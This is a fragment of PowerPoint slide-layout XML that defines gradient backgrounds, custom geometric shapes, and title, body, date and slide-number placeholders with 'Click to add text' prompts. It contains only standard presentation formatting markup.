          <a:lin ang="5400000" scaled="1"/>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16A13F7-BF00-BE8C-32F1-7E3B13B7F386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4085830" y="-1"/>
            <a:ext cx="8350645" cy="6994525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 8187237 w 8187650"/>
              <a:gd name="connsiteY0" fmla="*/ 2883262 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 8187237 w 8187650"/>
              <a:gd name="connsiteY1" fmla="*/ 6560352 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 8045326 w 8187650"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 6289128 w 8187650"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 8187650 w 8187650"/>
              <a:gd name="connsiteY4" fmla="*/ 430950 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 8187650 w 8187650"/>
              <a:gd name="connsiteY5" fmla="*/ 2175413 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 5948681 w 8187650"/>
              <a:gd name="connsiteY6" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 4192925 w 8187650"/>
              <a:gd name="connsiteY7" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 6831207 w 8187650"/>
              <a:gd name="connsiteY8" fmla="*/ 1335888 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 7977627 w 8187650"/>
              <a:gd name="connsiteY9" fmla="*/ 463100 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 3276228 w 8187650"/>
              <a:gd name="connsiteY10" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 6601303 w 8187650"/>
              <a:gd name="connsiteY11" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 6625701 w 8187650"/>
              <a:gd name="connsiteY12" fmla="*/ 73580 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 6538369 w 8187650"/>
              <a:gd name="connsiteY13" fmla="*/ 1197788 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 3833625 w 8187650"/>
              <a:gd name="connsiteY14" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 2095073 w 8187650"/>
              <a:gd name="connsiteY15" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 5122439 w 8187650"/>
              <a:gd name="connsiteY16" fmla="*/ 520605 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 5085837 w 8187650"/>
              <a:gd name="connsiteY17" fmla="*/ 241081 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 4846243 w 8187650"/>
              <a:gd name="connsiteY18" fmla="*/ 389163 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 1756863 w 8187650"/>
              <a:gd name="connsiteY19" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 0 w 818765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87650" h="6858000">
                <a:moveTo>
                  <a:pt x="8187237" y="2883262"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8187237" y="6560352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8045326" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6289128" y="6858000"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8187650" y="430950"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8187650" y="2175413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5948681" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4192925" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6831207" y="1335888"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7053951" y="870014"/>
                  <a:pt x="7490711" y="567195"/>
                  <a:pt x="7977627" y="463100"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3276228" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6601303" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6625701" y="73580"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6728450" y="439877"/>
                  <a:pt x="6710160" y="837463"/>
                  <a:pt x="6538369" y="1197788"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3833625" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2095073" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5122439" y="520605"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5179012" y="402475"/>
                  <a:pt x="5203969" y="297651"/>
                  <a:pt x="5085837" y="241081"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4969368" y="186175"/>
                  <a:pt x="4902815" y="271029"/>
                  <a:pt x="4846243" y="389163"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1756863" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6858000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                  <a:alpha val="50000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="21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a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596951" y="3275663"/>
            <a:ext cx="9327356" cy="443198"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="951304" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3200" b="0" kern="1200" cap="none" spc="-51" baseline="0" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="39000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect l="100000" b="100000"/>
                  </a:path>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3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illdown layout 1">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FA21643F-51A8-05E0-CC73-60F20B8756CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828077" y="1030138"/>
            <a:ext cx="7233559" cy="256159"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr kumimoji="0" lang="en-US" sz="1632"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mj-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ts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>Click to add text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A93C117-D6DB-F6B2-C5FA-B8FA9066D9D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3931658"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chemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                </a:gsLst>
                <a:path path="circle">
                  <a:fillToRect l="100000" b="100000"/>
                </a:path>
              </a:gradFill>
              <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D0D3FDE-5637-4413-350B-EF20DF680AA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828077" y="2494169"/>
            <a:ext cx="7233559" cy="256159"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr kumimoji="0" lang="en-US" sz="1632"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mj-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ts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>Click to add text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Placeholder 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{849BD100-00CF-0EBE-3AAD-995587BD60D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828077" y="3795741"/>
            <a:ext cx="7233559" cy="256159"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr kumimoji="0" lang="en-US" sz="1632"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mj-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ts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>Click to add text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83145147-302A-CBAB-D82E-F04E0938ACA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828077" y="5171622"/>
            <a:ext cx="7233559" cy="256159"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr kumimoji="0" lang="en-US" sz="1632"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mj-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ts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>Click to add text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111704703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ction Title blue">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="0">
              <a:srgbClr val="1978CF"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="1"/>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16A13F7-BF00-BE8C-32F1-7E3B13B7F386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4085830" y="-1"/>
            <a:ext cx="8350645" cy="6994525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 8187237 w 8187650"/>
              <a:gd name="connsiteY0" fmla="*/ 2883262 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 8187237 w 8187650"/>
              <a:gd name="connsiteY1" fmla="*/ 6560352 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 8045326 w 8187650"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 6289128 w 8187650"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 8187650 w 8187650"/>
              <a:gd name="connsiteY4" fmla="*/ 430950 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 8187650 w 8187650"/>
              <a:gd name="connsiteY5" fmla="*/ 2175413 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 5948681 w 8187650"/>
              <a:gd name="connsiteY6" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 4192925 w 8187650"/>
              <a:gd name="connsiteY7" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 6831207 w 8187650"/>
              <a:gd name="connsiteY8" fmla="*/ 1335888 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 7977627 w 8187650"/>
              <a:gd name="connsiteY9" fmla="*/ 463100 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 3276228 w 8187650"/>
              <a:gd name="connsiteY10" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 6601303 w 8187650"/>
              <a:gd name="connsiteY11" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 6625701 w 8187650"/>
              <a:gd name="connsiteY12" fmla="*/ 73580 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 6538369 w 8187650"/>
              <a:gd name="connsiteY13" fmla="*/ 1197788 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 3833625 w 8187650"/>
              <a:gd name="connsiteY14" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 2095073 w 8187650"/>
              <a:gd name="connsiteY15" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 5122439 w 8187650"/>
              <a:gd name="connsiteY16" fmla="*/ 520605 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 5085837 w 8187650"/>
              <a:gd name="connsiteY17" fmla="*/ 241081 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 4846243 w 8187650"/>
              <a:gd name="connsiteY18" fmla="*/ 389163 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 1756863 w 8187650"/>
              <a:gd name="connsiteY19" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 0 w 818765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87650" h="6858000">
                <a:moveTo>
                  <a:pt x="8187237" y="2883262"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8187237" y="6560352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8045326" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6289128" y="6858000"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8187650" y="430950"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8187650" y="2175413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5948681" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4192925" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6831207" y="1335888"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7053951" y="870014"/>
                  <a:pt x="7490711" y="567195"/>
                  <a:pt x="7977627" y="463100"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3276228" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6601303" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6625701" y="73580"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6728450" y="439877"/>
                  <a:pt x="6710160" y="837463"/>
                  <a:pt x="6538369" y="1197788"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3833625" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2095073" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5122439" y="520605"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5179012" y="402475"/>
                  <a:pt x="5203969" y="297651"/>
                  <a:pt x="5085837" y="241081"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4969368" y="186175"/>
                  <a:pt x="4902815" y="271029"/>
                  <a:pt x="4846243" y="389163"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1756863" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6858000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                  <a:alpha val="50000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="21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a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56DE15D4-0362-4BB9-82C1-977EBF04A3DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596951" y="3275663"/>
            <a:ext cx="9327356" cy="443198"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="951304" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3200" b="0" kern="1200" cap="none" spc="-51"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E273BEF0-980F-8B72-C443-E89A196BAD3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596951" y="3956014"/>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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A909E96A-ED00-0B44-03E6-CFBA25C6A4FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596951" y="3956014"/>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024404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103091"/>
            <a:ext cx="4027862" cy="501676"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="951304" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3260" b="0" kern="1200" cap="none" spc="-51"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3095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93715" y="597450"/>
            <a:ext cx="2355091" cy="299995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13910676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433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FC16E1-06CD-4047-9EA1-EF8E58E96DD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0AAED60-9DCC-496D-8C96-0F290BB01CF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/30/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A473208E-EF13-470B-AB3D-08966892EB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657A7D-1528-40BD-9DA7-6A13D3B40AAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F3FC784-35CA-4117-A303-96BE7F2045D6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4146012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illdown Layout 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E877D70-6848-F38D-F7FF-8F1864BCC0E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218238" y="2339603"/>
            <a:ext cx="5863604" cy="439479"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect l="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{410A8EB1-0D4D-93B5-AE61-1CA3920DF1C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600774" y="2339604"/>
            <a:ext cx="5280643" cy="1952480"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="932563" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="612"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="en-US" sz="1836"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1pPr>
            <a:lvl2pPr marL="233149" indent="-233149" algn="l" defTabSz="932563" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="612"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr kumimoji="0" lang="en-US" sz="1836"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2pPr>
            <a:lvl3pPr marL="233149" indent="-233149" algn="l" defTabSz="932563" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="612"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr kumimoji="0" lang="en-US" sz="1836"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3pPr>
            <a:lvl4pPr marL="233149" indent="-233149" algn="l" defTabSz="932563" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="612"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr kumimoji="0" lang="en-US" sz="1836"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4pPr>
